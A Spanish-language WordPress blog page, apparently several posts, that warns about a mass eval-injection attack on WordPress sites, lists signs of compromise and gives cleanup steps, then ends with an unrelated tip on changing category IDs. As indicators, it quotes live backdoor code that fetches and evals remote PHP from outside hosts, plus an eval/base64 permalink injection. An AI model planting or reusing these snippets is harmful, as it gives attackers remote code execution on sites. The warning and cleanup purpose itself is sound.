Desde hace unas horas, se esta produciendo un ataque masivo a todos los blogs wordpress incluso los que tienen la ultima versión. El ataque se produce a través de la función eval, inyectando codigo maligno en la base de satos SQl y cambiando las terminaciones de los enlaces de los posts. lo que da algo parecido como esto:

http://misitio.com/mi-post/${eval(base64_decode($_SERVER[HTTP_REFERER]))}

al mismo tiempo, se crean un numero considerable de administradores ( camuflados en usuarios normales ) que pueden hacer lo que quieren de tu blog,

Como saber si te ha atacado :

mira ver el codigo de

- “index.php”
- “wp-config.php”
- “wp-content/uploads/pass.php”

si encuentras codigo raro o diferente , es que te ha tocado.

Actualmente, lo unico que se puede hacer para remediar este tipo de ataques a traves del eval ( que se decia remediado desde la version 2.8 ) es

1- instalar el plugin Bad behavior. Y evitar que nuevos usuarios se registren en tu blog de momento. vigila bien la estructura de tu blog y las de tus enlaces.

Si tienes el wp-cache o el Wp super cache instalado, debes cambiar una linea de codigo para que el bad behavior te pueda proteger. ( en el wp cache es la linea 34 y la del superchache es la linea 56 ).

Busca este codigo en el fichero wp-cache-phase1.php :

Eval : Wordrpess hacked – haqueado

Como sabeis, wordpres es un código abierto y sus plugins también. Normalmente, no tiene porque pasar nada, pero últimamente, muchísimos  usuarios estan encontrando cosas raras en sus blogs, como que la pagina principal se redirecciona a webs de spam ( viagra , alargar penes etc…) o que  a la hora de querer editar la plantilla, te pide un usuario y una contraseña.

Eso significa claramente que tu wordpress esta comprometido, desde una simple inyección de código que tiene como objetivo desviar trafico a otras webs de spam, hasta una intrusión completa con toda regla, de un usuario que se mete como administrador.

Eso ultimo lo puedes comprobar si tu instalación lo permite en las tablas de Sql de tu base de datos, mirar en wp-option, wp-users, y mirar si hay uno nuevo a parte del tuyo.

Como detectar que tu wordpress esta entre manos de otros ?

- Cuando das click a tu enlace desde google o otro buscador, sales en otra web totalmente diferente, lo que consiguen con eso es ganar puntos y valor en las búsquedas de google.

- Lo mismo te pasa cuando das un click en el RSS

- Los que visitan tu blog y no tienen ni cookie ni login, seran redireccionados tambien a los sitios spam

- Si miras bien en las carpetas de uploads, veras algun fichero de este tipo :/uploads/2008/06/06/abcdefghijklmn.jpg o dentro de las imagenes del tema.

- En las tablas de tu base de datos, puedes encontrar una entrada tipo rss_f541b3abd05e7962fcab37737f40fad8, que realmente lo que hace es activar la imagen como plugin.

- Puedes encontrar en los ficheros php de tu wordpress lineas de codigo tipo eval() or base64_decode() :

if(isset($_GET['p'])) {
$sock = @fsockopen('km20725.keymachine.de', 80);
if($sock){
fwrite ($sock, 'GET http://km20725.keymachine.de/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p'].' HTTP/1.0'."\r\n");
fwrite ($sock, 'Host: km20725.keymachine.de'."\r\n\r\n");
while($content[] = fgets ($sock));
$content = implode('', $content);
@eval(trim(substr($content, strpos($content, "\r\n\r\n"))));
fclose ($sock);}
}

if(isset($_GET['p'])) { @eval(@file_get_contents('http://beliy.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
}

if(isset($_GET['p'])) { @eval(@file_get_contents('http://seogoogle.us/server/index.php?host='.$_SERVER['SERVER_NAME'].'&p='.$_GET['p']));
}

eval(gzinflate(base64_decode(

Como solucionarlo ?

- lo primero es hacer una copia de tu base de datos.

- Busca por ftp si hay rasgo de imágenes sospechosas y borrarlas.

- A traves de my php admin, mira los plugins activos y compara los que tienes activos en wordpress, si ves algunos sospechoso, borralo.

- limpia las cabeceras de header e index de cualquier tipo de código raro.

-Busca en los usuarios si hay alguno que no te suena, o en la base de datos, si hay alguno con valor nulo, y borralo.

- Cambia todos los ficheros de Wordpress con unos limpios y actualiza a la ultima version

- Crea un archivo index.html vacio y ponlo en la carpeta de plugins, asi la tapas.

CAMBIA TODAS TUS CONTRASEÑAS , PORQUE LO MAS PROBABLE ES QUE YA NO SON SOLO TUYAS ¡

- Y si quieres saber que lleva el codigo maligno, copialo y pega en esta pagina, y te de decriptara con suerte

Este video te acalara un poco como hacerlo:

Cambiar la ID de las categorías en wordpress

Mas de uno habrá tenido la necesidad por alguna razón o otra de cambiar la id de una categoría en wordpress. pero antes, hay que saber cual es la id de una categoría, hay un metodo muy facil que sirve igual para las categorías como para las paginas y los posts: en la lista de categorías posts o paginas en el panel de admin, pasar el ratón sobre cada categoría post o pagina, y mirar en la barra de abajo en la ventana, veréis una url al que apunta el link y al final esta idXXX , pues ese es.

Por lo de cambiar la id, es posible hacerlo en la base de datos a través del myphp admin, pero el problema es que pierdes la relación que tiene con los posts, por lo cual, es posible hacerlo en un blog virgen, sino, mucho trabajo va costar luego volver a ordenar los posts a adjuntarles a las categorías.

Pero tranquilo, si lo que buscas es arreglar el permalink ya que la categoría que te pone es la que tiene menor id, tienes una solución muy fácil : el plguin sCategory Permalink. te crea una opción para check al lado de todas las categorías seleccionadas, y la que elijes es la que sale arriba en la URL.
aquí tienes el enlace del plugin sCategory Permalink